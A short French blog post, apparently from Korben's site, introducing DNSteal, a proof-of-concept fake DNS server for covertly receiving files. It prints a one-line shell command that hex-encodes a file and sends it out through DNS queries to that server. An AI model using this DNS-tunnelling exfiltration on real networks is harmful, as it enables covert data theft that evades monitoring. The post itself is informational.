Aller au contenu
Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Transférer des fichiers en utilisant des requêtes DNS

Voici un proof of concept intéressant qui s’appelle DNSteal et qui permet de transférer des documents via le net, de manière très discrète en utilisant le protocole DNS. DNSteal est un script python qui fait office de faux serveur DNS et qui peut recevoir en entrée des fichiers.

Une fois en place, il suffit par exemple de lancer la commande suivante pour transférer l’image send.png au faux serveur DNS.

for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done

C’est plutôt rigolo non ?

dnssteal

DNSteal supporte aussi le transfert multi-fichiers et la compression de ceux-ci. Son développeur s’est fait plaisir 🙂

Si vous voulez plus d’infos, c’est sur Github que ça se passe.

Que faire après le bac quand on est passionné de cybersécurité ?

Entièrement dédiée à la cybersécurité, l’école Guardia est accessible soit directement après le bac (post-bac), soit après un bac+2 ou bac+3. En rejoignant l’école Guardia, vous deviendrez développeur informatique option cybersécurité (Bac+3) ou expert en cybersécurité (Bac+5).

Cliquez ici pour en savoir plus

Lien sponsorisé


Les articles du moment